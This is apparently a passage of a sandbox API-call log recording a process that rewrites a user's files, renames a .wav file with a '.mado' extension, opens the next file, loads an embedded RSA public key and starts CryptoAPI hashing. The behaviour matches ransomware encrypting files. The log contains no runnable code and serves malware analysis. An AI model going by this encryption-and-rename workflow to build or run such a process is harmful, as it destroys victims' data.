[0204.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80fa8 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe538 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80ff0 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe550 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe580 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5c8 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe598 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b72b80 [0204.947] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b72b80, Size=0x218) returned 0x3b7c6a8 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b78348 [0204.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe580 | out: hHeap=0x2c0000) returned 1 [0204.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe598 | out: hHeap=0x2c0000) returned 1 [0204.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5c8 | out: hHeap=0x2c0000) returned 1 [0204.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b78348 | out: hHeap=0x2c0000) returned 1 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5c8 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe598 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe580 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6ec98 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6edb0 [0204.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0204.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe598 | out: hHeap=0x2c0000) returned 1 [0204.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe580 | out: hHeap=0x2c0000) returned 1 [0204.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5c8 | out: hHeap=0x2c0000) returned 1 [0204.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.948] GetCurrentThreadId () returned 0x600 [0204.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bb80 [0204.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b68078 [0204.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0204.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6be98 [0204.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.948] GetCurrentThreadId () returned 0x600 [0204.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bc88 [0204.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bfa0 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5c8 [0204.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe580 [0204.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe598 [0204.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe568 [0204.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5e0 [0204.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5b0 [0204.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe5f8 [0204.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe580 | out: hHeap=0x2c0000) returned 1 [0204.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe580 [0204.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0204.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5c8 | out: hHeap=0x2c0000) returned 1 [0204.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6ec98 [0204.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5f8 | out: hHeap=0x2c0000) returned 1 [0204.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0204.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6eec8 [0204.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0204.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe580 | out: hHeap=0x2c0000) returned 1 [0204.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b78348 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0204.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bd90 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc88 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bd90 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b78348 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5b0 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe5e0 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe598 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe568 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6be98 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe550 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80ff0 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bfa0 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0204.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6edb0 | out: hHeap=0x2c0000) returned 1 [0204.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0204.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.952] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74e80*, nNumberOfBytesToWrite=0x34b3, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b74e80*, lpNumberOfBytesWritten=0x39cfb14*=0x34b3, lpOverlapped=0x0) returned 1 [0204.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.952] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x34b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.952] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74e80 [0204.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74e80, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b752b0 [0204.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.952] WriteFile (in: hFile=0x63c, lpBuffer=0x3b752b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b752b0*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b752b0 | out: hHeap=0x2c0000) returned 1 [0204.952] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.952] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.953] CloseHandle (hObject=0x63c) returned 1 [0204.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeff8 [0204.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74e80 [0204.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeff8 | out: hHeap=0x2c0000) returned 1 [0204.954] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\G_wsbMj2tnXma8d.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fdly50o\\g_wsbmj2tnxma8d.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\G_wsbMj2tnXma8d.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fdly50o\\g_wsbmj2tnxma8d.wav.mado")) returned 1 [0204.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0204.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.954] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef090 | out: hHeap=0x2c0000) returned 1 [0204.955] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63cffd30, ftCreationTime.dwHighDateTime=0x1d5ddb2, ftLastAccessTime.dwLowDateTime=0x5feefed0, ftLastAccessTime.dwHighDateTime=0x1d5d896, ftLastWriteTime.dwLowDateTime=0x5feefed0, ftLastWriteTime.dwHighDateTime=0x1d5d896, nFileSizeHigh=0x0, nFileSizeLow=0xa2a5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VROdpB54C9PpCUk8uSl.bmp", cAlternateFileName="VRODPB~1.BMP")) returned 1 [0204.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0204.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0204.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0204.955] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\VROdpB54C9PpCUk8uSl.bmp") returned=".bmp" [0204.955] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fDly50O\\VROdpB54C9PpCUk8uSl.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fdly50o\\vrodpb54c9ppcuk8usl.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.956] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=41637) returned 1 [0204.956] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.958] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa27f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.958] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.960] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.960] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xa2a5, lpOverlapped=0x0) returned 1 [0204.961] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.961] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.961] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.961] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0204.962] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.962] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.962] CryptGetHashParam (in: hHash=0x32ef238, 